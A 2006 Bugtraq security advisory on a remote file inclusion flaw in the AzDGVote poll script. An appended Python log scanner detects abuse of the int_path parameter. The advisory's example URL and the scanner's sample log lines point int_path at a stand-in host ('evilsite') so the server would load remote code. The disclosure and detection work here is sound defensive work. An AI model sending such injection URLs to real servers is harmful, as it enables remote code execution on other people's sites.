Message-ID: <20060411220320.2255.qmail@securityfocus.com>
Date: 11 Apr 2006 22:03:20 -0000
From: selfar2002@...mail.com
To: bugtraq@...urityfocus.com
Subject: AzDGVote File inclusion
AzDGVote File inclusion
---------------------------------
Site: http://www.azdg.com/
Demo: http://www.azdg.com/scripts/AzDGVote/vote.php?id=1
---------------------------------------
File inclusion
include $int_path."/AzDG.template.inc.php";
int_path parameter File inclusion
Aut File
vote.php,view.php,admin.php
and /admin/index.php
---------------------------------------
example
http://victim.com/poll/view.php?int_path=http://evilsite
-----------------------------------------
Discovered By SnIpEr_SA
E-mail: selfar2002@...mail.com, SnIpEr_SA@...mail.org
Site: www.3asfh.com www.lezr.com
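
Added example, not part of the original post or of AzDGVote: a log check a site operator could run to find requests that supply int_path to the scripts named in the advisory. It assumes a combined-format web server access log; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts the advisory lists as including $int_path."/AzDG.template.inc.php"
AFFECTED_NAMES = {"vote.php", "view.php", "admin.php"}
# Request line inside an access-log entry (assumed combined log format)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value beginning with a URL or stream-wrapper scheme, e.g. http://
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)

def is_affected(path):
    """True if the request path is one of the scripts named in the advisory."""
    p = path.lower()
    return p.rsplit("/", 1)[-1] in AFFECTED_NAMES or p.endswith("/admin/index.php")

def classify(log_line):
    """Return None, 'override' or 'remote' for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not is_affected(url.path):
        return None
    # parse_qs percent-decodes once; unquote again to catch double encoding
    params = parse_qs(url.query, keep_blank_values=True)
    values = [unquote(v) for v in params.get("int_path", [])]
    if not values:
        return None
    # int_path is an internal path variable, so any client-supplied value is
    # an anomaly; a scheme-prefixed value is the pattern shown in the advisory
    return "remote" if any(SCHEME_RE.match(v) for v in values) else "override"

def scan(lines):
    """Return (verdict, line) pairs for every flagged line."""
    return [(v, l) for l in lines if (v := classify(l)) is not None]

# Constructed sample log lines (documentation IP range, not real traffic)
SAMPLE = [
    '203.0.113.5 - - [11/Apr/2006:22:10:01 +0000] "GET /poll/view.php?int_path=http://evilsite HTTP/1.1" 200 512',
    '203.0.113.9 - - [11/Apr/2006:22:10:07 +0000] "GET /poll/vote.php?id=1 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [11/Apr/2006:22:11:30 +0000] "GET /poll/admin/index.php?int_path=%68ttp%3A%2F%2Fevilsite HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Apr/2006:22:12:02 +0000] "GET /poll/vote.php?id=1&int_path=../tmp HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE):
        print(verdict, "|", line)
```

POST bodies and cookies do not appear in an access log, so an int_path supplied that way would need application-level or WAF logging to be seen.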